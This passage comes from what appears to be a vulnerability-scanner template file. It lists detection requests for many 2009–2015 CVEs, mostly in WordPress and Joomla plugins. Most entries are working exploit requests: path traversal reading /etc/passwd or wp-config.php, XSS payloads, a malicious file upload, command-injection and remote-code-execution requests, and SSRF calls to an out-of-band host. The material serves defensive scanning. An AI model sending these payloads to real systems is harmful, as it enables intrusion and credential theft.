{{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Navis","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4694","info":{"name":"WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4455","info":{"name":"WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\n","POST /?gf_page=upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa\n\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"field_id\"\n\n3\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"form_id\"\n\n1\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"gform_unique_id\"\n\n../../../\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"name\"\n\n{{filename}}.phtml\n--a54906fe12c504cb01ca836d062f82fa\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.jpg\"\nContent-Type: text/html\n\n{{randstr}}\n--a54906fe12c504cb01ca836d062f82fa--\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"Failed to upload file\")","status_code_2 == 200","contains(body_2, \"uploaded_filename\\\":\\\"{{filename}}.jpg\")"],"condition":"and"}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-0554","info":{"name":"ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlsecurity.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var wpapskkey","var WscDevPin","var sessionkey"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4666","info":{"name":"Xceedium Xsuite <=2.4.4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":[""]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-7823","info":{"name":"Kentico CMS 8.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-1635","info":{"name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Range":"bytes=0-18446744073709551615"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HTTP Error 416","The requested range is not satisfiable"],"condition":"and"},{"type":"word","part":"header","words":["Microsoft"]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4202","info":{"name":"Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0932","info":{"name":"Horde/Horde Groupware - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1953","info":{"name":"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1305","info":{"name":"Joomla! Component JInventory 1.23.02 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1304","info":{"name":"Joomla! Component User Status - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1983","info":{"name":"Joomla! Component redTWITTER 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2307","info":{"name":"Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1345","info":{"name":"Joomla! Component Cookex Agency CKForms - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1858","info":{"name":"Joomla! Component SMEStorage - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1659","info":{"name":"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1219","info":{"name":"Joomla! Component com_janews - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2507","info":{"name":"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0696","info":{"name":"Joomla! Component Jw_allVideos - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1494","info":{"name":"Joomla! Component AWDwall 1.5.4 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4239","info":{"name":"Tiki Wiki CMS Groupware 5.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2035","info":{"name":"Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1607","info":{"name":"Joomla! Component WMI 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3203","info":{"name":"Joomla! Component PicSell 1.0 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1353","info":{"name":"Joomla! Component LoginBox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1981","info":{"name":"Joomla! Component Fabrik 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0467","info":{"name":"Joomla! Component CCNewsLetter - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1603","info":{"name":"Joomla! Component ZiMBCore 0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1586","info":{"name":"HP System Management Homepage (SMH) v2.x.x.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/red2301.html?RedirectUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2010-1653","info":{"name":"Joomla! Component Graphics 1.0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1715","info":{"name":"Joomla! Component Online Exam 1.5.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5278","info":{"name":"MODx manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1533","info":{"name":"Joomla! Component TweetLA 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2857","info":{"name":"Joomla! Component Music Manager - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1722","info":{"name":"Joomla! Component Online Market 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1723","info":{"name":"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 